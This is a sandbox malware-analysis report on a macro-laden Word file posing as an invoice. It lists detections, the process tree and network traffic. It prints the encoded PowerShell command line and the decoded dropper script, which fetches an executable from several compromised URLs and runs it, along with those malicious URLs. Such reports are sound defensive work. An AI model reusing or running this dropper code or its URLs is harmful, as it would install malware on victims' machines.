Edit tour

Windows Analysis Report
INV_PO_12172019EX.doc

Overview

General Information

Sample Name:	INV_PO_12172019EX.doc
Analysis ID:	800690
MD5:	3b7fa78ebf399bb0230590bfec589fa7
SHA1:	199d4646fdbf9b5167d80ed71ce0ea406c40b018
SHA256:	5c2dc72128d235ecdca49e4026ec782cdce9021c5b46ebf841000bab5ebcc129
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Encrypted powershell cmdline option found

Very long command line found

Creates processes via WMI

Suspicious powershell command line found

Machine Learning detection for sample

Potential dropper URLs found in powershell memory

Queries the volume information (name, serial number etc) of a device

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Document contains an embedded VBA macro which executes code when the document is opened / closed

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Enables debug privileges

Document contains an ObjectPool stream indicating possible embedded files or OLE objects

Potential document exploit detected (unknown TCP traffic)

Document contains embedded VBA macros

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1568 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

powershell.exe (PID: 2412 cmdline: Powershell -w hidden -en JABOAHAAegBmAHIAbgB6AGIAcgB0AGkAdQBtAD0AJwBWAGYAZgB1AHcAeQBoAHkAaQBnAGkAeQBxACcAOwAkAEUAcwB4AHQAeQBkAGoAcABrACAAPQAgACcAOAA3ADMAJwA7ACQAWQBsAG4AagBxAHMAcwBjAG0AcABtAD0AJwBXAHkAbABxAGEAaQBkAGsAcQBhACcAOwAkAEkAbQB4AGYAcgB4AHQAYQBwAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAcwB4AHQAeQBkAGoAcABrACsAJwAuAGUAeABlACcAOwAkAFIAcgB5AGkAcABqAGYAaABkAD0AJwBZAHQAaQBkAG4AYwBpAGcAbABlACcAOwAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0APQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQBUAC4AVwBFAEIAYwBMAEkAZQBOAFQAOwAkAEcAcABjAGsAeQBzAGMAeQBhAGUAbgBkAHoAPQAnAGgAdAB0AHAAOgAvAC8AYQBtAHMAdABhAGYAZgByAGUAYwBvAHIAZABzAC4AYwBvAG0ALwBpAG4AZABpAHYAaQBkAHUAYQBsAEEAcABpAC8AMAAvACoAaAB0AHQAcAA6AC8ALwBmAG8AbwB6AG8AbwBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUQB4AGkANwBpAFYARAAvACoAaAB0AHQAcAA6AC8ALwA3AGEAcgBhAHMAcABvAHIAdAAuAGMAbwBtAC8AdgBhAGwAaQBkAGEAdABlAGYAaQBlAGwAZAAvAGcAagAvACoAaAB0AHQAcAA6AC8ALwBkAGUAdgAyAC4AZQBrAHQAbwBuAGUAbgBkAG8AbgAuAGcAcgAvAGMAZwBpAC0AYgBpAG4ALwBtAFQAVABDAEYAbQBWAGUALwAqAGgAdAB0AHAAcwA6AC8ALwBkAGkAYQBnAG4AbwBzAHQAaQBjAGEALQBwAHIAbwBkAHUAYwB0AHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGgAaQBvADIAdQA3AHcALwAnAC4AIgBzAGAAUABMAGkAdAAiACgAJwAqACcAKQA7ACQASQB4AGkAcQBvAGcAZgBpAGsAbQA9ACcAQgB0AHQAeABnAGgAdgBpAG4AbwBtAHcAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQATQBiAGMAbgB6AGcAcwBwAGEAdAAgAGkAbgAgACQARwBwAGMAawB5AHMAYwB5AGEAZQBuAGQAegApAHsAdAByAHkAewAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0ALgAiAEQATwBXAGAATgBMAE8AYABBAEQAYABGAEkAbABFACIAKAAkAE0AYgBjAG4AegBnAHMAcABhAHQALAAgACQASQBtAHgAZgByAHgAdABhAHAAbwApADsAJABIAGgAdABvAGIAZgBmAHAAbABnAHMAPQAnAFgAYQB5AG0AcABpAGMAdQAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAbQB4AGYAcgB4AHQAYQBwAG8AKQAuACIAbABgAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIANwAxADYAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAdAAiACgAJABJAG0AeABmAHIAeAB0AGEAcABvACkAOwAkAEUAaQBkAHkAdABrAGwAeQA9ACcAWQBiAHEAeABjAHUAdgBkAGkAcQBuACcAOwBiAHIAZQBhAGsAOwAkAEwAbQBxAGEAaABqAGMAdwB5AHcAdABrAD0AJwBHAHcAYQB1AHUAaABsAHoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATwBuAG8AZwBxAGIAdQBtAG8APQAnAEwAZABrAGUAbwBnAHMAYQBmAHgAbgBqACcA MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: INV_PO_12172019EX.doc	ReversingLabs: Detection: 29%
Source: INV_PO_12172019EX.doc	Virustotal: Detection: 70%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: INV_PO_12172019EX.doc

Avira: detected

Antivirus detection for URL or domain

Source: https://diagnostica-products.com/wp-admin/hio2u7w/PE	Avira URL Cloud: Label: malware
Source: https://diagnostica-products.com/wp-admin/hio2u7w/	Avira URL Cloud: Label: malware
Source: http://amstaffrecords.com/individualApi/0/	Avira URL Cloud: Label: malware
Source: http://amstaffrecords.com/indivi	Avira URL Cloud: Label: phishing
Source: http://amstaffrecords.com	Avira URL Cloud: Label: phishing
Source: http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/	Avira URL Cloud: Label: malware
Source: http://dev2.ektonendon.gr	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: dev2.ektonendon.gr	Virustotal: Detection: 7%			Perma Link
Source: amstaffrecords.com	Virustotal: Detection: 8%			Perma Link

Machine Learning detection for sample

Source: INV_PO_12172019EX.doc

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: tomation.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb56a source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdbIL source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb1. source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: emti.pdb source: powershell.exe, 00000005.00000002.941139445.000000001B3A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbll source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8ystem.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: global traffic	DNS query: name: amstaffrecords.com
Source: global traffic	DNS query: name: foozoop.com
Source: global traffic	DNS query: name: 7arasport.com
Source: global traffic	DNS query: name: ww38.7arasport.com
Source: global traffic	DNS query: name: dev2.ektonendon.gr
Source: global traffic	DNS query: name: diagnostica-products.com

Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 103.224.212.222:80
Source: global traffic	TCP traffic: 103.224.212.222:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 103.224.212.222:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 103.224.212.222:80
Source: global traffic	TCP traffic: 103.224.212.222:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 103.224.212.222:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 103.224.212.222:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 103.224.212.222:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 103.224.212.222:80
Source: global traffic	TCP traffic: 103.224.212.222:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 13.248.148.254:80
Source: global traffic	TCP traffic: 13.248.148.254:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 13.248.148.254:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 13.248.148.254:80
Source: global traffic	TCP traffic: 13.248.148.254:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 13.248.148.254:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 162.212.129.161:80
Source: global traffic	TCP traffic: 13.248.148.254:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 13.248.148.254:80
Source: global traffic	TCP traffic: 162.212.129.161:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 162.212.129.161:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 162.212.129.161:80
Source: global traffic	TCP traffic: 162.212.129.161:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 162.212.129.161:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 162.212.129.161:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 13.248.148.254:80

Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 103.224.212.222:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 13.248.148.254:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 162.212.129.161:80

Networking

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://amstaffrecords.com/individualApi/0/http://foozoop.com/wp-content/Qxi7iVD/http://7arasport.com/validatefield/gj/*http://
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://amstaffrecords.com/individualApi/0/http://foozoop.com/wp-content/Qxi7iVD/http://7arasport.com/validatefield/gj/http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/https://diagnostica-products.com/wp-admin/hio2u7w/
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://amstaffrecords.com/individualApi/0/http://foozoop.com/wp-content/Qxi7iVD/http://7arasport.com/validatefield/gj/http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/https://diagnostica-products.com/wp-admin/hio2u7w/PE
Source: powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp	String found in memory: $Npzfrnzbrtium='Vffuwyhyigiyq';$Esxtydjpk = '873';$Ylnjqsscmpm='Wylqaidkqa';$Imxfrxtapo=$env:userprofile+'\'+$Esxtydjpk+'.exe';$Rryipjfhd='Ytidncigle';$Uwudrmogjlosm=&('new-'+'objec'+'t') neT.WEBcLIeNT;$Gpckyscyaendz='http://amstaffrecords.com/individualApi/0/http://foozoop.com/wp-content/Qxi7iVD/http://7arasport.com/validatefield/gj/http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/https://diagnostica-products.com/wp-admin/hio2u7w/'."s`PLit"('*');$Ixiqogfikm='Bttxghvinomws';foreach($Mbcnzgspat in $Gpckyscyaendz){try{$Uwudrmogjlosm."DOW`NLO`AD`FIlE"($Mbcnzgspat, $Imxfrxtapo);$Hhtobffplgs='Xaympicu';If ((.('G'+'et-'+'Item') $Imxfrxtapo)."l`EnG`TH" -ge 27169) {[Diagnostics.Process]::"sT`ARt"($Imxfrxtapo);$Eidytkly='Ybqxcuvdiqn';break;$Lmqahjcwywtk='Gwauuhlz'}}catch{}}$Onogqbumo='Ldkeogsafxnj'

Source: global traffic	HTTP traffic detected: GET /validatefield/gj/ HTTP/1.1Host: 7arasport.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /validatefield/gj/ HTTP/1.1Host: ww38.7arasport.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-bin/mTTCFmVe/ HTTP/1.1Host: dev2.ektonendon.grConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 13.248.148.254 13.248.148.254
Source: Joe Sandbox View	IP Address: 13.248.148.254 13.248.148.254

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Feb 2023 17:14:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Feb 2023 17:14:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 17:14:15 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 315Keep-Alive: timeout=3, max=500Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://7arasport.com
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://7arasport.com/validatefield/gj/
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://amstaffrecords.com
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://amstaffrecords.com/indivi
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.941139445.000000001B40F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amstaffrecords.com/individualApi/0/
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dev2.ektonendon.gr
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foozoop.com
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foozoop.com/wp
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foozoop.com/wp-content/Qxi7iVD/
Source: powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ja.com/he
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ww38.7arasport.com
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ww38.7arasport.com/validatefield/gj/
Source: powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929114441.000000000024F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929114441.000000000024F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://diagnostica-products.com
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://diagnostica-products.com/wp-admin/hio2u7w/
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://diagnostica-products.com/wp-admin/hio2u7w/PE

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{98B5056E-1AC7-42C9-BDDC-599C5AB91B4A}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: amstaffrecords.com

Source: global traffic	HTTP traffic detected: GET /validatefield/gj/ HTTP/1.1Host: 7arasport.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /validatefield/gj/ HTTP/1.1Host: ww38.7arasport.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-bin/mTTCFmVe/ HTTP/1.1Host: dev2.ektonendon.grConnection: Keep-Alive

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing button from the yellow bar above. Once you have enabled editing, please click Enable
Source: Screenshot number: 4	Screenshot OCR: Enable content button from the yellow bar above. 0 Page: I of I , Words:O N@m 13 ;a 10096 G)
Source: Screenshot number: 8	Screenshot OCR: Enable content button from the yellow bar above O "g'"o' ' i WO""O i i '3 75% G) A GE) :a @
Source: Document image extraction number: 0	Screenshot OCR: Enable editing button from the yellow bar above. Once you have enabled editing, please click Enable
Source: Document image extraction number: 0	Screenshot OCR: Enable content button from the yellow bar above.
Source: Document image extraction number: 1	Screenshot OCR: Enable editing button from the yellow bar above. Once you have enabled editing, please click Enable
Source: Document image extraction number: 1	Screenshot OCR: Enable content button from the yellow bar above.

Very long command line found

Source: unknown

Process created: Commandline size = 2153

Source: INV_PO_12172019EX.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module Vidpgeil, Function Document_open
Source: ~DF413F6883B338D566.TMP.0.dr	OLE, VBA macro line: Private Sub Document_open()

Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFD6589A193BC4C172.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF413F6883B338D566.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: INV_PO_12172019EX.doc

OLE indicator, ObjectPool: true

Source: INV_PO_12172019EX.doc	OLE indicator, VBA macros: true
Source: ~DF413F6883B338D566.TMP.0.dr	OLE indicator, VBA macros: true

Source: INV_PO_12172019EX.doc	ReversingLabs: Detection: 29%
Source: INV_PO_12172019EX.doc	Virustotal: Detection: 70%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -w hidden -en JABOAHAAegBmAHIAbgB6AGIAcgB0AGkAdQBtAD0AJwBWAGYAZgB1AHcAeQBoAHkAaQBnAGkAeQBxACcAOwAkAEUAcwB4AHQAeQBkAGoAcABrACAAPQAgACcAOAA3ADMAJwA7ACQAWQBsAG4AagBxAHMAcwBjAG0AcABtAD0AJwBXAHkAbABxAGEAaQBkAGsAcQBhACcAOwAkAEkAbQB4AGYAcgB4AHQAYQBwAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAcwB4AHQAeQBkAGoAcABrACsAJwAuAGUAeABlACcAOwAkAFIAcgB5AGkAcABqAGYAaABkAD0AJwBZAHQAaQBkAG4AYwBpAGcAbABlACcAOwAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0APQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQBUAC4AVwBFAEIAYwBMAEkAZQBOAFQAOwAkAEcAcABjAGsAeQBzAGMAeQBhAGUAbgBkAHoAPQAnAGgAdAB0AHAAOgAvAC8AYQBtAHMAdABhAGYAZgByAGUAYwBvAHIAZABzAC4AYwBvAG0ALwBpAG4AZABpAHYAaQBkAHUAYQBsAEEAcABpAC8AMAAvACoAaAB0AHQAcAA6AC8ALwBmAG8AbwB6AG8AbwBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUQB4AGkANwBpAFYARAAvACoAaAB0AHQAcAA6AC8ALwA3AGEAcgBhAHMAcABvAHIAdAAuAGMAbwBtAC8AdgBhAGwAaQBkAGEAdABlAGYAaQBlAGwAZAAvAGcAagAvACoAaAB0AHQAcAA6AC8ALwBkAGUAdgAyAC4AZQBrAHQAbwBuAGUAbgBkAG8AbgAuAGcAcgAvAGMAZwBpAC0AYgBpAG4ALwBtAFQAVABDAEYAbQBWAGUALwAqAGgAdAB0AHAAcwA6AC8ALwBkAGkAYQBnAG4AbwBzAHQAaQBjAGEALQBwAHIAbwBkAHUAYwB0AHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGgAaQBvADIAdQA3AHcALwAnAC4AIgBzAGAAUABMAGkAdAAiACgAJwAqACcAKQA7ACQASQB4AGkAcQBvAGcAZgBpAGsAbQA9ACcAQgB0AHQAeABnAGgAdgBpAG4AbwBtAHcAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQATQBiAGMAbgB6AGcAcwBwAGEAdAAgAGkAbgAgACQARwBwAGMAawB5AHMAYwB5AGEAZQBuAGQAegApAHsAdAByAHkAewAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0ALgAiAEQATwBXAGAATgBMAE8AYABBAEQAYABGAEkAbABFACIAKAAkAE0AYgBjAG4AegBnAHMAcABhAHQALAAgACQASQBtAHgAZgByAHgAdABhAHAAbwApADsAJABIAGgAdABvAGIAZgBmAHAAbABnAHMAPQAnAFgAYQB5AG0AcABpAGMAdQAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAbQB4AGYAcgB4AHQAYQBwAG8AKQAuACIAbABgAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIANwAxADYAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBv